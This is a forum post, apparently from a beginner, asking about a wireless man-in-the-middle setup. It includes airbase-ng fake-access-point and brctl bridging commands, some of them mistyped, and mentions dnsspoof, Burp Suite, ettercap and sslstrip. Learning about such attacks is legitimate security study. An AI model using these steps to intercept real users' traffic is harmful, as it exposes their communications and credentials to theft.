Ok so this one is similar to the other thread i posted but this time is about the MITM attack. I'm just starting and i'm a bit overwhelmed with all the ways this can be done over wireless.

Right now i'm using airbase-ng to create a fake AP with no encription, the i create a bridge between the interface airbase-ng creates and the interface actually connect to the internet and i use dnsspoof and burpsuite to get the packages.

I have two questions:

the first is about something i can't explain with my method. Here is the code i use:

Code:
airmon-ng start wlan0
iwconfig mon0 channel 1
iwconfig wlan0 channel 1

airobase-ng  --essid test mon0
ifconfig at0 up

brctl addbr mitm
brctl addif eth0
brctl addif at0
ifconfig eth0 0.0.0.0 up
at this point, my connection to eth0 goes away,

Code:
ifconfig at0 0.0.0.0 up
ifconfig mitm up
dhclient3 mitm
after this i still get a connection to the internet. How? Please understand i'm really a beginner and i am pretty sure i'm missing something obvious.

My second question is about the MITM attack itself. I know you guys hate when people ask how something is done, but i just wanted to know if ther are better ways than mine to accomplish what i did. I've heard about using ettercap/Arpspoof and sslstrip, is it easier / works better?

Thanks.